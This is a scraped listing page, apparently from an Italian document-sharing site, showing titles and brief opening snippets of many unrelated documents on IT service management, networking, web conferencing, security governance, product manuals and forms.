Dettagli

Web conferencing software. Massimiliano Greco - Ivan Cerato - Mario Salvetti

Web conferencing software. Massimiliano Greco - Ivan Cerato - Mario Salvetti 1 Web conferencing software Massimiliano Greco - Ivan Cerato - Mario Salvetti Arpa Piemonte 2 Che cosa è Big Blue Button? Free, open source, web conferencing software Semplice ed immediato ( Just push

Dettagli

Il Form C cartaceo ed elettronico

Il Form C cartaceo ed elettronico Il Form C cartaceo ed elettronico Giusy Lo Grasso Roma, 9 luglio 2012 Reporting DURANTE IL PROGETTO VENGONO RICHIESTI PERIODIC REPORT entro 60 giorni dalla fine del periodo indicato all Art 4 del GA DELIVERABLES

Dettagli

Interfaccia Web per customizzare l interfaccia dei terminali e

Interfaccia Web per customizzare l interfaccia dei terminali e SIP - Session Initiation Protocol Il protocollo SIP (RFC 2543) è un protocollo di segnalazione e controllo in architettura peer-to-peer che opera al livello delle applicazioni e quindi sviluppato per stabilire

Dettagli

Problem Management proattivo di sicurezza secondo ITIL: attività di Etichal Hacking

Problem Management proattivo di sicurezza secondo ITIL: attività di Etichal Hacking Seminario associazioni: Seminario a cura di itsmf Italia Problem Management proattivo di sicurezza secondo ITIL: attività di Etichal Hacking Andrea Praitano Agenda Struttura dei processi ITIL v3; Il Problem

Dettagli

IT Service Management, le best practice per la gestione dei servizi

IT Service Management, le best practice per la gestione dei servizi Il Framework ITIL e gli Standard di PMI : : possibili sinergie Milano, Venerdì, 11 Luglio 2008 IT Service Management, le best practice per la gestione dei servizi Maxime Sottini Slide 1 Agenda Introduzione

Dettagli

Data Alignment and (Geo)Referencing (sometimes Registration process)

Data Alignment and (Geo)Referencing (sometimes Registration process) Data Alignment and (Geo)Referencing (sometimes Registration process) All data aquired from a scan position are refered to an intrinsic reference system (even if more than one scan has been performed) Data

Dettagli

Virtualizzazione con Microsoft Tecnologie e Licensing

Virtualizzazione con Microsoft Tecnologie e Licensing Microsoft Virtualizzazione con Microsoft Tecnologie e Licensing Profile Redirezione dei documenti Offline files Server Presentation Management Desktop Windows Vista Enterprise Centralized Desktop Application

Dettagli

DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI

DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI 2 Introduzione Questa email è una truffa o è legittima? È ciò che si chiedono con sempre maggiore frequenza

Dettagli

group HIGH CURRENT MULTIPLEX NODE

group HIGH CURRENT MULTIPLEX NODE HIGH CURRENT MULTIPLEX NODE edizione/edition 04-2010 HIGH CURRENT MULTIPLEX NODE DESCRIZIONE GENERALE GENERAL DESCRIPTION L'unità di controllo COBO è una centralina elettronica Multiplex Slave ; la sua

Dettagli

Installazione di GFI Network Server Monitor

Installazione di GFI Network Server Monitor Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows

Dettagli

Security Governance. Technet Security Day Milano/Roma 2007 NSEC Security Excellence Day Milano 2007. Feliciano Intini

Security Governance. Technet Security Day Milano/Roma 2007 NSEC Security Excellence Day Milano 2007. Feliciano Intini Technet Security Day Milano/Roma 2007 NSEC Security Excellence Day Milano 2007 Security Governance Chief Security Advisor Microsoft Italia feliciano.intini@microsoft.com http://blogs.technet.com/feliciano_intini

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

Il vostro sogno diventa realtà... Your dream comes true... Close to Volterra,portions for sale of "typical tuscan"

Il vostro sogno diventa realtà... Your dream comes true... Close to Volterra,portions for sale of typical tuscan Il vostro sogno diventa realtà... Vicinanze di Volterra vendita di porzione di fabbricato "tipico Toscano" realizzate da recupero di casolare in bellissima posizione panoramica. Your dream comes true...

Dettagli

Plesk Automation. Parallels. Domande tecniche più frequenti

Plesk Automation. Parallels. Domande tecniche più frequenti Parallels Plesk Automation Primo trimestre, 2013 Domande tecniche più frequenti Questo documento ha come scopo quello di rispondere alle domande tecniche che possono sorgere quando si installa e si utilizza

Dettagli

Guida ai Servizi Internet per il Referente Aziendale

Guida ai Servizi Internet per il Referente Aziendale Guida ai Servizi Internet per il Referente Aziendale Indice Indice Introduzione...3 Guida al primo accesso...3 Accessi successivi...5 Amministrazione dei servizi avanzati (VAS)...6 Attivazione dei VAS...7

Dettagli

Symbolic. Ambiti Operativi. Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp.

Symbolic. Ambiti Operativi. Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp. Symbolic Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp. La nostra mission è di rendere disponibili soluzioni avanzate per la sicurezza

Dettagli

INTERNET e RETI di CALCOLATORI A.A. 2014/2015 Capitolo 4 DHCP Dynamic Host Configuration Protocol Fausto Marcantoni fausto.marcantoni@unicam.

INTERNET e RETI di CALCOLATORI A.A. 2014/2015 Capitolo 4 DHCP Dynamic Host Configuration Protocol Fausto Marcantoni fausto.marcantoni@unicam. Laurea in INFORMATICA INTERNET e RETI di CALCOLATORI A.A. 2014/2015 Capitolo 4 Dynamic Host Configuration Protocol fausto.marcantoni@unicam.it Prima di iniziare... Gli indirizzi IP privati possono essere

Dettagli

Proposition for a case-study identification process. 6/7 May 2008 Helsinki

Proposition for a case-study identification process. 6/7 May 2008 Helsinki Conférence des Régions Périphériques Maritimes d Europe Conference of Peripheral Maritime Regions of Europe ANALYSIS PARTICIPATION TO THE FP THROUGH A TERRITORIAL AND REGIONAL PERSPECTIVE MEETING WITH

Dettagli

IT-BOOK. Domini Hosting Web marketing E-mail e PEC

IT-BOOK. Domini Hosting Web marketing E-mail e PEC 5 giugno 09 IT-BOOK Configurazioni e cartatteristiche tecniche possono essere soggette a variazioni senza preavviso. Tutti i marchi citati sono registrati dai rispettivi proprietari. Non gettare per terra:

Dettagli

MS OFFICE COMMUNICATIONS SERVER 2007 IMPLEMENTING AND MAINTAINING AUDIO/VISUAL CONFERENCING AND WEB CONFERENCING

MS OFFICE COMMUNICATIONS SERVER 2007 IMPLEMENTING AND MAINTAINING AUDIO/VISUAL CONFERENCING AND WEB CONFERENCING MS OFFICE COMMUNICATIONS SERVER 2007 IMPLEMENTING AND MAINTAINING AUDIO/VISUAL CONFERENCING AND WEB CONFERENCING UN BUON MOTIVO PER [cod. E603] L obiettivo del corso è fornire le competenze e conoscenze

Dettagli

La disseminazione dei progetti europei

La disseminazione dei progetti europei La disseminazione dei progetti europei Indice 1. La disseminazione nel 7PQ: un obbligo! 2. Comunicare nei progetti europei 3. Target audience e Key Message 4. Sviluppare un dissemination plan 5. Message

Dettagli

COME DIVENTARE PARTNER AUTORIZZATO @

COME DIVENTARE PARTNER AUTORIZZATO @ COME DIVENTARE PARTNER AUTORIZZATO @ Come diventare Partner di Ruckus Utilizzare il seguente link http://www.ruckuswireless.com/ e selezionare dal menu : PARTNERS > Channel Partners Applicare per diventare

Dettagli

WWW.TINYLOC.COM CUSTOMER SERVICE GPS/ RADIOTRACKING DOG COLLAR. T. (+34) 937 907 971 F. (+34) 937 571 329 sales@tinyloc.com

WWW.TINYLOC.COM CUSTOMER SERVICE GPS/ RADIOTRACKING DOG COLLAR. T. (+34) 937 907 971 F. (+34) 937 571 329 sales@tinyloc.com WWW.TINYLOC.COM CUSTOMER SERVICE T. (+34) 937 907 971 F. (+34) 937 571 329 sales@tinyloc.com GPS/ RADIOTRACKING DOG COLLAR MANUALE DI ISTRUZIONI ACCENSIONE / SPEGNERE DEL TAG HOUND Finder GPS Il TAG HOUND

Dettagli

Rilascio dei Permessi Volo

Rilascio dei Permessi Volo R E P U B L I C O F S A N M A R I N O C I V I L A V I A T I O N A U T H O R I T Y SAN MARINO CIVIL AVIATION REGULATION Rilascio dei Permessi Volo SM-CAR PART 5 Approvazione: Ing. Marco Conti official of

Dettagli

APPLICATION FORM 1. YOUR MOTIVATION/ LA TUA MOTIVAZIONE

APPLICATION FORM 1. YOUR MOTIVATION/ LA TUA MOTIVAZIONE APPLICATION FORM Thank you for your interest in our project. We would like to understand better your motivation in taking part in this specific project. So please, read carefully the form, answer the questions

Dettagli

Il business risk reporting: lo. gestione continua dei rischi

Il business risk reporting: lo. gestione continua dei rischi 18 ottobre 2012 Il business risk reporting: lo strumento essenziale per la gestione continua dei rischi Stefano Oddone, EPM Sales Consulting Senior Manager di Oracle 1 AGENDA L importanza di misurare Business

Dettagli

Corso Base ITIL V3 2008

Corso Base ITIL V3 2008 Corso Base ITIL V3 2008 PROXYMA Contrà San Silvestro, 14 36100 Vicenza Tel. 0444 544522 Fax 0444 234400 Email: proxyma@proxyma.it L informazione come risorsa strategica Nelle aziende moderne l informazione

Dettagli

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

Sistemi Web-Based - Terminologia. Progetto di Sistemi Web-Based Prof. Luigi Laura, Univ. Tor Vergata, a.a. 2010/2011

Sistemi Web-Based - Terminologia. Progetto di Sistemi Web-Based Prof. Luigi Laura, Univ. Tor Vergata, a.a. 2010/2011 Sistemi Web-Based - Terminologia Progetto di Sistemi Web-Based Prof. Luigi Laura, Univ. Tor Vergata, a.a. 2010/2011 CLIENT: il client è il programma che richiede un servizio a un computer collegato in

Dettagli

Istruzione N. Versione. Ultima. modifica. Funzione. Data 18/12/2009. Firma. Approvato da: ASSEMBLAGGIO COLLAUDO TRAINING IMBALLO. service 07.

Istruzione N. Versione. Ultima. modifica. Funzione. Data 18/12/2009. Firma. Approvato da: ASSEMBLAGGIO COLLAUDO TRAINING IMBALLO. service 07. Istruzione N 62 Data creazione 18/ 12/2009 Versione N 00 Ultima modifica TIPO ISTRUZIONE ASSEMBLAGGIO COLLAUDO TRAINING MODIFICA TEST FUNZIONALE RIPARAZIONE/SOSTITUZIONE IMBALLO TITOLO DELL ISTRUZIONE

Dettagli

I veri benefici dell Open Source nell ambito del monitoraggio IT. Georg Kostner, Department Manager Würth Phoenix

I veri benefici dell Open Source nell ambito del monitoraggio IT. Georg Kostner, Department Manager Würth Phoenix I veri benefici dell Open Source nell ambito del monitoraggio IT Georg Kostner, Department Manager Würth Phoenix IT Service secondo ITIL Il valore aggiunto dell Open Source Servizi IT Hanno lo scopo di

Dettagli

Windows Compatibilità

Windows Compatibilità Che novità? Windows Compatibilità CODESOFT 2014 é compatibile con Windows 8.1 e Windows Server 2012 R2 CODESOFT 2014 Compatibilità sistemi operativi: Windows 8 / Windows 8.1 Windows Server 2012 / Windows

Dettagli

12.5 UDP (User Datagram Protocol)

12.5 UDP (User Datagram Protocol) CAPITOLO 12. SUITE DI PROTOCOLLI TCP/IP 88 12.5 UDP (User Datagram Protocol) L UDP (User Datagram Protocol) é uno dei due protocolli del livello di trasporto. Come l IP, é un protocollo inaffidabile, che

Dettagli

GLI ERRORI DI OUTLOOK EXPRESS

GLI ERRORI DI OUTLOOK EXPRESS Page 1 of 6 GLI ERRORI DI OUTLOOK EXPRESS 1) Impossibile inviare il messaggio. Uno dei destinatari non è stato accettato dal server. L'indirizzo di posta elettronica non accettato è "user@dominio altro

Dettagli

Il pos virtuale di CartaSi per le vendite a distanza

Il pos virtuale di CartaSi per le vendite a distanza X-Pay Il pos virtuale di CartaSi per le vendite a distanza Agenda CartaSi e l e-commerce Chi è CartaSi CartaSi nel mercato Card Not Present I vantaggi I vantaggi offerti da X-Pay I vantaggi offerti da

Dettagli

Payment Card Industry (PCI) Data Security Standard

Payment Card Industry (PCI) Data Security Standard Payment Card Industry (PCI) Data Security Standard Procedure per la scansione di sicurezza Versione 1.1 Release: settembre 2006 Indice generale Finalità... 1 Introduzione... 1 Ambito di applicazione dei

Dettagli

La gestione integrata della sicurezza in Agenzia ANSA: dal firewalling all'utm Michelangelo Uberti, Sales Engineer Babel S.r.l.

La gestione integrata della sicurezza in Agenzia ANSA: dal firewalling all'utm Michelangelo Uberti, Sales Engineer Babel S.r.l. La gestione integrata della sicurezza in Agenzia ANSA: dal firewalling all'utm Michelangelo Uberti, Sales Engineer Babel S.r.l. Babel S.r.l. - P.zza S. Benedetto da Norcia 33, 00040 Pomezia (RM) www.babel.it

Dettagli

Profilo Aziendale ISO 9001: 2008. METISOFT spa - p.iva 00702470675 - www.metisoft.it - info@metisoft.it

Profilo Aziendale ISO 9001: 2008. METISOFT spa - p.iva 00702470675 - www.metisoft.it - info@metisoft.it ISO 9001: 2008 Profilo Aziendale METISOFT spa - p.iva 00702470675 - www.metisoft.it - info@metisoft.it Sede legale: * Viale Brodolini, 117-60044 - Fabriano (AN) - Tel. 0732.251856 Sede amministrativa:

Dettagli

rischi del cloud computing

rischi del cloud computing rischi del cloud computing maurizio pizzonia dipartimento di informatica e automazione università degli studi roma tre 1 due tipologie di rischi rischi legati alla sicurezza informatica vulnerabilità affidabilità

Dettagli

Manuale installazione KNOS

Manuale installazione KNOS Manuale installazione KNOS 1. PREREQUISITI... 3 1.1 PIATTAFORME CLIENT... 3 1.2 PIATTAFORME SERVER... 3 1.3 PIATTAFORME DATABASE... 3 1.4 ALTRE APPLICAZIONI LATO SERVER... 3 1.5 ALTRE APPLICAZIONI LATO

Dettagli

FileMaker Server 12. Guida introduttiva

FileMaker Server 12. Guida introduttiva FileMaker Server 12 Guida introduttiva 2007 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi di FileMaker,

Dettagli

Nota Informativa Relativa alla Circolare 2009/1

Nota Informativa Relativa alla Circolare 2009/1 Nota Informativa Relativa alla Circolare 2009/1 In merito alla nuova circolare del Sottosegretariato per il Commercio Estero del Primo Ministero della Repubblica di Turchia, la 2009/21, (pubblicata nella

Dettagli

Pronti per la Voluntary Disclosure?

Pronti per la Voluntary Disclosure? Best Vision GROUP The Swiss hub in the financial business network Pronti per la Voluntary Disclosure? Hotel de la Paix, 21 aprile 2015, ore 18:00 Hotel Lugano Dante, 22 aprile 2015, ore 17:00 Best Vision

Dettagli

Evoluzione dei servizi di incasso e pagamento per il mercato italiano

Evoluzione dei servizi di incasso e pagamento per il mercato italiano www.pwc.com/it Evoluzione dei servizi di incasso e pagamento per il mercato italiano giugno 2013 Sommario Il contesto di riferimento 4 Un modello di evoluzione dei servizi di incasso e pagamento per il

Dettagli

IT Service Management: il Framework ITIL. Dalmine, 20 Gennaio 2012 Deborah Meoli, Senior Consultant Quint Italy

IT Service Management: il Framework ITIL. Dalmine, 20 Gennaio 2012 Deborah Meoli, Senior Consultant Quint Italy IT Service Management: il Framework ITIL Dalmine, 20 Gennaio 2012 Deborah Meoli, Senior Consultant Quint Italy Quint Wellington Redwood 2007 Agenda Quint Wellington Redwood Italia IT Service Management

Dettagli

UNITA DI MISURA E TIPO DI IMBALLO

UNITA DI MISURA E TIPO DI IMBALLO Poste ALL. 15 Informazioni relative a FDA (Food and Drug Administration) FDA: e un ente che regolamenta, esamina, e autorizza l importazione negli Stati Uniti d America d articoli che possono avere effetti

Dettagli

Sistemi di gestione dei dati e dei processi aziendali. Information Technology General Controls

Sistemi di gestione dei dati e dei processi aziendali. Information Technology General Controls Information Technology General Controls Indice degli argomenti Introduzione agli ITGC ITGC e altre componenti del COSO Framework Sviluppo e manutenzione degli applicativi Gestione operativa delle infrastrutture

Dettagli

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito, semplice da utilizzare e fornisce

Dettagli

GUIDA ALLE BEST PRACTICE PER MOBILE DEVICE MANAGEMENT E MOBILE SECURITY

GUIDA ALLE BEST PRACTICE PER MOBILE DEVICE MANAGEMENT E MOBILE SECURITY GUIDA ALLE BEST PRACTICE PER MOBILE DEVICE MANAGEMENT E MOBILE SECURITY Con Kaspersky, adesso è possibile. www.kaspersky.it/business Be Ready for What's Next SOMMARIO Pagina 1. APERTI 24 ORE SU 24...2

Dettagli

INFORMATIVA SUI COOKIE

INFORMATIVA SUI COOKIE INFORMATIVA SUI COOKIE I Cookie sono costituiti da porzioni di codice installate all'interno del browser che assistono il Titolare nell erogazione del servizio in base alle finalità descritte. Alcune delle

Dettagli

Quando il CIO scende in fabbrica

Quando il CIO scende in fabbrica Strategie di protezione ed esempi pratici Alessio L.R. Pennasilico - apennasilico@clusit.it Maurizio Martinozzi - maurizio_martinozzi@trendmicro.it Security Summit Verona, Ottobre 2014 $whois -=mayhem=-

Dettagli

Gi-Gi Art. 859 - User's Guide Istruzioni d'uso

Gi-Gi Art. 859 - User's Guide Istruzioni d'uso doc.4.12-06/03 Gi-Gi Art. 859 - User's Guide Istruzioni d'uso A belaying plate that can be used in many different conditions Una piastrina d'assicurazione che può essere utilizzata in condizioni diverse.

Dettagli

Managed Services e Unified Communication & Collaboration: verso il paradigma del Cloud Computing

Managed Services e Unified Communication & Collaboration: verso il paradigma del Cloud Computing Managed Services e Unified Communication & Collaboration: verso il paradigma del Cloud Computing Claudio Chiarenza (General Manager and Chief Strategy Officer) Italtel, Italtel logo and imss (Italtel Multi-Service

Dettagli

Curriculum Vitae INFORMAZIONI PERSONALI FARHANG DAREHSHURI, NUSHIN ESPERIENZA LAVORATIVA. Nome. Data di nascita 28 gennaio 1969

Curriculum Vitae INFORMAZIONI PERSONALI FARHANG DAREHSHURI, NUSHIN ESPERIENZA LAVORATIVA. Nome. Data di nascita 28 gennaio 1969 Curriculum Vitae INFORMAZIONI PERSONALI Nome FARHANG DAREHSHURI, NUSHIN Nazionalità Italiana Data di nascita 28 gennaio 1969 Titolo di studio Laurea in Ingegneria Elettronica conseguita presso il politecnico

Dettagli

La collaborazione come strumento per l'innovazione.

La collaborazione come strumento per l'innovazione. La collaborazione come strumento per l'innovazione. Gabriele Peroni Manager of IBM Integrated Communication Services 1 La collaborazione come strumento per l'innovazione. I Drivers del Cambiamento: Le

Dettagli

COME FRODE. la possibilità propri dati. brevissimo. Reply www.reply.eu

COME FRODE. la possibilità propri dati. brevissimo. Reply www.reply.eu FRAUD MANAGEMENT. COME IDENTIFICARE E COMB BATTERE FRODI PRIMA CHE ACCADANO LE Con una visione sia sui processi di business, sia sui sistemi, Reply è pronta ad offrire soluzioni innovative di Fraud Management,

Dettagli

Narrare i gruppi. Rivista semestrale pubblicata on-line dal 2006 Indirizzo web: www.narrareigruppi.it - Direttore responsabile: Giuseppe Licari

Narrare i gruppi. Rivista semestrale pubblicata on-line dal 2006 Indirizzo web: www.narrareigruppi.it - Direttore responsabile: Giuseppe Licari Narrare i gruppi Etnografia dell interazione quotidiana Prospettive cliniche e sociali ISSN: 2281-8960 Narrare i gruppi. Etnografia dell'interazione quotidiana. Prospettive cliniche e sociali è una Rivista

Dettagli

COMINCIAMO A SENTIRCI UNA FAMIGLIA

COMINCIAMO A SENTIRCI UNA FAMIGLIA COMINCIAMO A SENTIRCI UNA FAMIGLIA IL PRIMO GIORNO CON LA FAMIGLIA OSPITANTE FIRST DAY WITH THE HOST FAMILY Questa serie di domande, a cui gli studenti risponderanno insieme alle loro famiglie, vuole aiutare

Dettagli

ATA MEDIATRIX 2102 GUIDA ALL INSTALLAZIONE

ATA MEDIATRIX 2102 GUIDA ALL INSTALLAZIONE ATA MEDIATRIX 2102 GUIDA ALL INSTALLAZIONE Mediatrix 2102 ATA Guida all installazione EUTELIAVOIP Rev1-0 pag.2 INDICE SERVIZIO EUTELIAVOIP...3 COMPONENTI PRESENTI NELLA SCATOLA DEL MEDIATRIX 2102...3 COLLEGAMENTO

Dettagli

Intalio. Leader nei Sistemi Open Source per il Business Process Management. Andrea Calcagno Amministratore Delegato

Intalio. Leader nei Sistemi Open Source per il Business Process Management. Andrea Calcagno Amministratore Delegato Intalio Convegno Open Source per la Pubblica Amministrazione Leader nei Sistemi Open Source per il Business Process Management Navacchio 4 Dicembre 2008 Andrea Calcagno Amministratore Delegato 20081129-1

Dettagli

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus EUROPEAN COMPUTER DRIVING LICENCE IT Security Syllabus Scopo Questo documento presenta il syllabus di ECDL Standard IT Security. Il syllabus descrive, attraverso i risultati del processo di apprendimento,

Dettagli

www.queen.it info@mbox.queen.it Gruppo Queen.it Listino Utente Finale Gennaio 2001

www.queen.it info@mbox.queen.it Gruppo Queen.it Listino Utente Finale Gennaio 2001 Listino Gennaio 2001 pag. 1 Gruppo Queen.it Listino Utente Finale Gennaio 2001 Profilo aziendale Chi è il Gruppo Queen.it Pag. 2 Listino connettività Listino Connettività RTC Pag. 3 Listino Connettività

Dettagli

Milano, Settembre 2009 BIOSS Consulting

Milano, Settembre 2009 BIOSS Consulting Milano, Settembre 2009 BIOSS Consulting Presentazione della società Agenda Chi siamo 3 Cosa facciamo 4-13 San Donato Milanese, 26 maggio 2008 Come lo facciamo 14-20 Case Studies 21-28 Prodotti utilizzati

Dettagli

PerformAzioni International Workshop Festival 22nd February 3rd May 2013 LIV Performing Arts Centre Bologna, Italy APPLICATION FORM AND BANK DETAILS

PerformAzioni International Workshop Festival 22nd February 3rd May 2013 LIV Performing Arts Centre Bologna, Italy APPLICATION FORM AND BANK DETAILS PerformAzioni International Workshop Festival 22nd February 3rd May 2013 LIV Performing Arts Centre Bologna, Italy APPLICATION FORM AND BANK DETAILS La domanda di partecipazione deve essere compilata e

Dettagli

Sicurezza del DNS. DNSSEC & Anycast. Claudio Telmon ctelmon@clusit.it

Sicurezza del DNS. DNSSEC & Anycast. Claudio Telmon ctelmon@clusit.it Sicurezza del DNS DNSSEC & Anycast Claudio Telmon ctelmon@clusit.it Perché il DNS Fino a metà degli anni '80, la traduzione da nomi a indirizzi IP era fatta con un grande file hosts Fino ad allora non

Dettagli

Reti di Telecomunicazione Lezione 7

Reti di Telecomunicazione Lezione 7 Reti di Telecomunicazione Lezione 7 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Il protocollo Programma della lezione file transfer protocol descrizione architetturale descrizione

Dettagli

LA TECHNOLOGY TRANSFER PRESENTA SUZANNE ROBERTSON MASTERING THE REQUIREMENTS PROCESS COME COSTRUIRE IL SISTEMA CHE IL VOSTRO UTENTE DESIDERA

LA TECHNOLOGY TRANSFER PRESENTA SUZANNE ROBERTSON MASTERING THE REQUIREMENTS PROCESS COME COSTRUIRE IL SISTEMA CHE IL VOSTRO UTENTE DESIDERA LA TECHNOLOGY TRANSFER PRESENTA SUZANNE ROBERTSON MASTERING THE REQUIREMENTS PROCESS COME COSTRUIRE IL SISTEMA CHE IL VOSTRO UTENTE DESIDERA ROMA 20-22 OTTOBRE 2014 RESIDENZA DI RIPETTA - VIA DI RIPETTA,

Dettagli

Qual è l errore più comune tra i Trader sul Forex e come possiamo evitarlo? David Rodriguez, Quantitative Strategist drodriguez@dailyfx.

Qual è l errore più comune tra i Trader sul Forex e come possiamo evitarlo? David Rodriguez, Quantitative Strategist drodriguez@dailyfx. Qual è l errore più comune tra i Trader sul Forex e come possiamo evitarlo? David Rodriguez, Quantitative Strategist drodriguez@dailyfx.com Avvertenza di Rischio: Il Margin Trading su forex e/o CFD comporta

Dettagli

24V DC ±10% 0.5... 1 W. Fluido Fluid. 15 Nl/min

24V DC ±10% 0.5... 1 W. Fluido Fluid. 15 Nl/min elettropiloti 0 mm 0 mm solenoids Elettropilota Solenoid valve 0 mm 00.44.0 ACCESSORI - ACCESSORIES 07.049.0 Connettore per elettropilota 0 mm con cavetto rosso/nero, lunghezza 400 mm - connector for 0

Dettagli

Smobilizzo pro-soluto di Lettere di Credito Import

Smobilizzo pro-soluto di Lettere di Credito Import definizione L operazione presuppone l emissione di una lettera di credito IMPORT in favore dell esportatore estero, con termine di pagamento differito (es. 180 gg dalla data di spedizione con documenti

Dettagli

Process automation Grazie a oltre trent anni di presenza nel settore e all esperienza maturata in ambito nazionale e internazionale, Elsag Datamat ha acquisito un profondo know-how dei processi industriali,

Dettagli

Zabbix 4 Dummies. Dimitri Bellini, Zabbix Trainer Quadrata.it

Zabbix 4 Dummies. Dimitri Bellini, Zabbix Trainer Quadrata.it Zabbix 4 Dummies Dimitri Bellini, Zabbix Trainer Quadrata.it Relatore Nome: Biografia: Dimitri Bellini Decennale esperienza su sistemi operativi UX based, Storage Area Network, Array Management e tutto

Dettagli

QUIPAGO - MODALITÀ PAYMENT

QUIPAGO - MODALITÀ PAYMENT E-Commerce Qui Pago è l offerta di Key Client per il Commercio Elettronico: un Pos virtuale altamente affidabile ed efficiente che prevede diverse modalità d utilizzo: Payment (integrazione col sito del

Dettagli

AGLI OPERATORI DELLA STAMPA E attiva la procedura di accredito alle Serie WSK 2014. La richiesta di accredito deve pervenire entro il 9 febbraio 2014

AGLI OPERATORI DELLA STAMPA E attiva la procedura di accredito alle Serie WSK 2014. La richiesta di accredito deve pervenire entro il 9 febbraio 2014 AGLI OPERATORI DELLA STAMPA E attiva la procedura di accredito alle Serie WSK 2014. La richiesta di accredito deve pervenire entro il 9 febbraio 2014 Per la richiesta di accredito alla singola gara, le

Dettagli

LA VIOLENZA NEI LUOGHI DI LAVORO. CLAUDIO CORTESI cld.cortesi@gmail.com

LA VIOLENZA NEI LUOGHI DI LAVORO. CLAUDIO CORTESI cld.cortesi@gmail.com LA VIOLENZA NEI LUOGHI DI LAVORO CLAUDIO CORTESI cld.cortesi@gmail.com VIOLENZE NEI LUOGHI DI LAVORO: COSA SONO? any action, incident or behaviour, that departs from reasonable conduct in which a person

Dettagli

Presentazioni multimediali relative al senso del tatto DIMENSIONI LIVELLO INIZIALE LIVELLO INTERMEDIO LIVELLO AVANZATO

Presentazioni multimediali relative al senso del tatto DIMENSIONI LIVELLO INIZIALE LIVELLO INTERMEDIO LIVELLO AVANZATO PERCORSO DI INSEGNAMENTO/APPRENDIMENTO TIPO DI UdP: SEMPLICE (monodisciplinare) ARTICOLATO (pluridisciplinare) Progetto didattico N. 1 Titolo : Let s investigate the world with our touch! Durata: Annuale

Dettagli

Cyber Security: Rischi & Soluzioni

Cyber Security: Rischi & Soluzioni Cyber Security: Rischi & Soluzioni Massimo Basile VP Cyber Security Italian Business Area Celano, 21/11/2014 Il gruppo Finmeccanica HELICOPTERS AgustaWestland NHIndustries DEFENCE AND SECURITY ELECTRONICS

Dettagli

Web Conferencing Open Source

Web Conferencing Open Source Web Conferencing Open Source A cura di Giuseppe Maugeri g.maugeri@bembughi.org 1 Cos è BigBlueButton? Sistema di Web Conferencing Open Source Basato su più di quattordici componenti Open-Source. Fornisce

Dettagli

progettiamo e realizziamo architetture informatiche Company Profile

progettiamo e realizziamo architetture informatiche Company Profile Company Profile Chi siamo Kammatech Consulting S.r.l. nasce nel 2000 con l'obiettivo di operare nel settore I.C.T., fornendo servizi di progettazione, realizzazione e manutenzione di reti aziendali. Nel

Dettagli

CMMI-Dev V1.3. Capability Maturity Model Integration for Software Development, Version 1.3. Roma, 2012 Ercole Colonese

CMMI-Dev V1.3. Capability Maturity Model Integration for Software Development, Version 1.3. Roma, 2012 Ercole Colonese CMMI-Dev V1.3 Capability Maturity Model Integration for Software Development, Version 1.3 Roma, 2012 Agenda Che cos è il CMMI Costellazione di modelli Approccio staged e continuous Aree di processo Goals

Dettagli

Parallels Plesk Panel

Parallels Plesk Panel Parallels Plesk Panel Notifica sul Copyright ISBN: N/A Parallels 660 SW 39 th Street Suite 205 Renton, Washington 98057 USA Telefono: +1 (425) 282 6400 Fax: +1 (425) 282 6444 Copyright 1999-2009, Parallels,

Dettagli

Consulenza tecnologica globale

Consulenza tecnologica globale Orientamento al cliente Innovazione Spirito di squadra Flessibilità Un gruppo di professionisti dedicati alle imprese di ogni settore merceologico e dimensione, capaci di supportare il Cliente nella scelta

Dettagli

Il software per la gestione smart del Call Center

Il software per la gestione smart del Call Center Connecting Business with Technology Solutions. Il software per la gestione smart del Call Center Center Group srl 1 Comunica : per la gestione intelligente del tuo call center Comunica è una web application

Dettagli

Processi ITIL. In collaborazione con il nostro partner:

Processi ITIL. In collaborazione con il nostro partner: Processi ITIL In collaborazione con il nostro partner: NetEye e OTRS: la piattaforma WÜRTHPHOENIX NetEye è un pacchetto di applicazioni Open Source volto al monitoraggio delle infrastrutture informatiche.

Dettagli

ManageEngine ITSM: HelpDesk ITIL, gestione degli asset IT e MDM. Andrea Mannara Business Unit Manager

ManageEngine ITSM: HelpDesk ITIL, gestione degli asset IT e MDM. Andrea Mannara Business Unit Manager ManageEngine ITSM: HelpDesk ITIL, gestione degli asset IT e MDM Andrea Mannara Business Unit Manager ManageEngine Portfolio Network Data Center Desktop & MDM ServiceDesk & Asset Active Directory Log &

Dettagli

DTT : DECODER, SWITCH- OFF PROCESS, CNID. Roberto de Martino Contents and Multimedia Department RAK/AGCOM

